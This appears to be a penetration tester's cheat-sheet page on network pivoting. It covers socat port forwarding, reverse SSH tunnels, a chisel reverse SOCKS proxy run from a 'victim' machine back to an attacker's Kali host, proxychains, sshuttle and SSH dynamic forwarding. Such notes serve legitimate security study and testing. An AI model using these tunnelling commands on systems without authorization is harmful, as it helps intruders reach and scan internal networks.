Pivoting
Port Forwarding
The goal is to redirect packet from one port to another port.
# from ipv4 to ipv6, all packet to localhost:445 will direct to <ipv6>:445
sudo socat TCP-LISTEN:445, fork TCP:<ipv6>:445
ssh to kali machine

note:
local-port and local-machine in the kali machine (attacker)
ssh -R -N <local-port>:127.0.0.1:<service-port> root@<local-machine>
Reverse Proxy
chisel
ref: https://www.youtube.com/watch?v=dIqoULXmhXg
Attacker (Kali)
./chisel server -p 8000 --reverse

Run in Victim Machine
Windows
chisel.exe client <attacker ip>:8000 R:socks

Linux
./chisel client <attacker ip>:8000 R:sockss
Config the proxychains (Attacker)
change /etc/proxychains4.conf
[ProxyList]
socks5 127.0.0.1 1080
Run command
proxychains nmap -sT -p 88 -Pn -n <machine 2 ip>
sshuttle
Need (user login as ssh)
# single
sshuttle -r username@remotehost 0.0.0.0/0
# example
sshuttle user@192.168.20.35 192.168.30.0/24
sshuttle -r root@10.1.1.1 10.2.2.0/24
SSH Tunnel
nice ref:https://www.isabekov.pro/reverse-ssh-tunnel/
Can't ssh to machine?
ssh -p 22 -R "<attacker port>:<host port>

Forward Proxy
chisel
sshuttle
SSH Tunnel (Recommended if you wanna access internal port)
Forward Proxy
Need SSH to machine:
ssh -D <local port> <user>@<IP of victim you have>
#example
ssh -D 8989 local@10.10.10.10
It mean, every packet to 127.0.0.1:8989 will be forwarded as IP 10.10.10.10
You can set proxy on your browser
or proxychains.conf
[Manual Proxy]
socks4 127.0.0.1 8989
Don't forget to using incognito to your browser or clear cache, for better process.

If that internal port have vhost configuration, you must set up that /etc/hosts on kali linux with pointing to local port (/etc/hosts on victim machine).
Case of forward proxy
Are you stuck?
Network Pentest with Chisel

https://notes.benheater.com/books/network-pivoting/page/penetrating-networks-via-chisel-proxies
Last updated